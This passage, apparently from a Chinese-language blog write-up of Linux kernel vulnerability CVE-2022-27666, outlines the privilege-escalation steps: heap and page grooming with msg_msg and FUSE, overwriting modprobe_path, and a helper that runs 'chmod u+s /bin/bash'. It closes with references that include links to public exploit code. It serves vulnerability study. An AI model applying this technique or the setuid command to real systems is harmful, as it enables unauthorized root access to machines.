任意写：还是利用 msg_msg 来进行任意写。由于普通用户需要 specific capability 才能使用userfaultfd，可以采用 CVE-2022-0185 中的介绍的FUSE方法来进行任意写。通过FUSE可以实现用户空间文件系统，然后映射我们的内存地址，只要有读写访问到该地址就可以调用我们的页错误处理函数，这样可以控制当 msg_msg->next 被篡改之后，再允许 copy_from_user() 继续访问用户空间的数据。

提权：利用任意写来篡改 modprbe_path 提权。后面方法和 CVE-2022-0185 一样。将 modprbe_path 改为 /tmp/get_rooot （运行chmod u+s /bin/bash），这样提权后只要运行 /bin/bash 即可提权。

（1）分配2个连续的 8-page dumy 对象（占位对象）；

（2）映射消息内容到FUSE，释放第2个占位对象，分配1个8-page slab，填满 msg_msg，线程会暂停在 copy_from_user()；

（3）释放第1个占位对象，分配漏洞对象，触发越界写来篡改 msg_msg->next 为 modprobe_path 地址；

（4）执行一个错误格式的binary 触发 modprobe；

（5）打开 /bin/bash 即可提权。

exp说明：

• 原exp中前1271行是设置环境，不重要（作者说，环境设置部分的代码是syzkaller自动生成的，非常复杂；只有利用部分，也即 loop() 函数是作者写的，我们需要重点研究该函数），需要用到几个符号：single_start / single_next / single_stop / modprobe_path，在原exploit的111行修改即可。

• exp中 main 函数设置完环境之后，调用 clone() 创建子进程执行 loop() 函数，loop() 函数实现主要利用过程。参见 clone()分析，不同于 fork() / vfork() ，clone() 克隆生成的子进程继续运行时不以调用处为起点，转而去调用以参数func所指定的函数；当函数func返回或者是调用 exit()（或者 _exit()）之后，克隆产生的子进程就会终止，父进程可以通过 wait() 一类函数来等待克隆子进程；调用者必须分配一块大小适中的内存空间供子进程的栈使用，同时将这块内存的指针置于参数 child_stack 中。

  #define _GNU_SOURCE
  #include <sched.h>
  int clone(int (*func)(void*),void *child_stack,int flags,void *func_arg,....
             /*pid_t *ptid,struct user_desc *tls,pid_t *ctid*/);
                                       Return process ID of child on success,or -1 on error
  

• 页喷射对象：进行页风水和页占位的对象是ring_buffer，因为其size设置很灵活，适合页喷射。

参考

[1] exploit及测试环境下载地址: https://github.com/bsauce/kernel-exploit-factory
[2] 参考: https://blog.csdn.net/qq_16097611/article/details/104965045
[3] cac2661c53f3: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cac2661c53f35cbe651bef9b07026a5a05ab8ce0
[4] 03e2a30f6a27: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=03e2a30f6a27e2f3e5283b777f6ddd146b38c738
[5] patch: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ebe48d368e97d007bfeb76fcb065d6cfc4c96645
[6] esp6_output_head(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/esp6.c#L513
[7] skb_page_frag_refill(): https://elixir.bootlin.com/linux/v5.16.14/source/net/core/sock.c#L2705
[8] sendmsg(): https://elixir.bootlin.com/linux/v5.16.14/source/net/socket.c#L2504
[9] __sys_sendmsg(): https://elixir.bootlin.com/linux/v5.16.14/source/net/socket.c#L2495
[10] ___sys_sendmsg(): https://elixir.bootlin.com/linux/v5.16.14/source/net/socket.c#L2466
[11] ____sys_sendmsg(): https://elixir.bootlin.com/linux/v5.16.14/source/net/socket.c#L2412
[12] sock_sendmsg(): https://elixir.bootlin.com/linux/v5.16.14/source/net/socket.c#L724
[13] sock_sendmsg_nosec(): https://elixir.bootlin.com/linux/v5.16.14/source/net/socket.c#L704
[14] rawv6_sendmsg(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/raw.c#L956
[15] rawv6_push_pending_frames(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/raw.c#L613
[16] ip6_push_pending_frames(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/ip6_output.c#L1935
[17] ip6_send_skb(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/ip6_output.c#L1915
[18] ip6_local_out(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/output_core.c#L161
[19] dst_output(): https://elixir.bootlin.com/linux/v5.16.14/source/include/net/dst.h#L450
[20] xfrm6_output(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/xfrm6_output.c#L94
[21] NF_HOOK_COND(): https://elixir.bootlin.com/linux/v5.16.14/source/include/linux/netfilter.h#L287
[22] __xfrm6_output(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/xfrm6_output.c#L87
[23] xfrm_output():
[24] xfrm_output2(): https://elixir.bootlin.com/linux/v5.16.14/source/net/xfrm/xfrm_output.c#L614
[25] xfrm_output_resume(): https://elixir.bootlin.com/linux/v5.16.14/source/net/xfrm/xfrm_output.c#L595
[26] dst_output(): https://elixir.bootlin.com/linux/v5.16.14/source/include/net/dst.h#L451
[27] ip6_output(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/ip6_output.c#L226
[28] NF_HOOK_COND(): https://elixir.bootlin.com/linux/v5.16.14/source/include/linux/netfilter.h#L287
[29] ip6_finish_output: https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/ip6_output.c#L201
[30] __ip6_finish_output: https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/ip6_output.c#L191
[31] ip6_finish_output2(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/ip6_output.c#L126
[32] neigh_output(): https://elixir.bootlin.com/linux/v5.16.14/source/include/net/neighbour.h#L533
[33] neigh_hh_output(): https://elixir.bootlin.com/linux/v5.16.14/source/include/net/neighbour.h#L519
[34] dev_queue_xmit(): https://elixir.bootlin.com/linux/v5.16.14/source/net/core/dev.c#L4262
[35] __dev_queue_xmit(): https://elixir.bootlin.com/linux/v5.16.14/source/net/core/dev.c#L4220
[36] validate_xmit_skb(): https://elixir.bootlin.com/linux/v5.16.14/source/net/core/dev.c#L3699
[37] validate_xmit_xfrm(): https://elixir.bootlin.com/linux/v5.16.14/source/net/xfrm/xfrm_device.c#L160
[38] esp6_xmit(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/esp6_offload.c#L322
[39] esp_output_head(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv4/esp4.c#L477
[40] null_skcipher_crypt(): https://elixir.bootlin.com/linux/v5.16.14/source/crypto/crypto_null.c#L76
[41] esp6_xmit(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/esp6_offload.c#L363
[42] esp6_output_tail(): https://elixir.bootlin.com/linux/v5.16.14/source/net/ipv6/esp6.c#L659
[43] crypto_aead_encrypt(): https://elixir.bootlin.com/linux/v5.16.14/source/crypto/aead.c#L94
[44] crypto_authenc_encrypt(): https://elixir.bootlin.com/linux/v5.16.14/source/crypto/authenc.c#L210
[45] crypto_authenc_copy_assoc(): https://elixir.bootlin.com/linux/v5.16.14/source/crypto/authenc.c#L189
[46] crypto_skcipher_encrypt(): https://elixir.bootlin.com/linux/v5.16.14/source/crypto/skcipher.c#L630
[47] null_skcipher_crypt(): https://elixir.bootlin.com/linux/v5.16.14/source/crypto/crypto_null.c#L85
[48] esp_output_fill_trailer(): https://elixir.bootlin.com/linux/v5.16.14/source/include/net/esp.h#L14
[49] page_alloc.c: https://elixir.bootlin.com/linux/latest/source/mm/page_alloc.c
[50] Linux page allocator: https://www.kernel.org/doc/gorman/html/understand/understand009.html
[51] free_area: https://elixir.bootlin.com/linux/v5.16.14/source/include/linux/mmzone.h#L97
[52] zone->free_area: https://elixir.bootlin.com/linux/v5.16.14/source/include/linux/mmzone.h#L617
[53] shaping heap: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
[54] user_key_payload: https://elixir.bootlin.com/linux/v5.16.14/source/include/keys/user-type.h#L27
[55] ELOISE: https://zplin.me/papers/ELOISE.pdf
[56] post: https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html
[57] specific capability: https://lwn.net/Articles/819834/
[58] CVE-2022-0185: https://www.willsroot.io/2022/01/cve-2022-0185.html
[59] CVE-2022-0185: https://www.willsroot.io/2022/01/cve-2022-0185.html
[60] clone()分析: https://blog.csdn.net/ren18281713749/article/details/94769023
[61] CVE-2022-27666: Exploit esp6 modules in Linux kernel: https://etenal.me/archives/1825
[62] exploit: https://github.com/plummm/CVE-2022-27666
[63] [漏洞分析] CVE-2022-27666 IPV6 ESP协议页溢出内核提权: https://blog.csdn.net/Breeze_CAT/article/details/123922861

阅读原文

跳转微信打开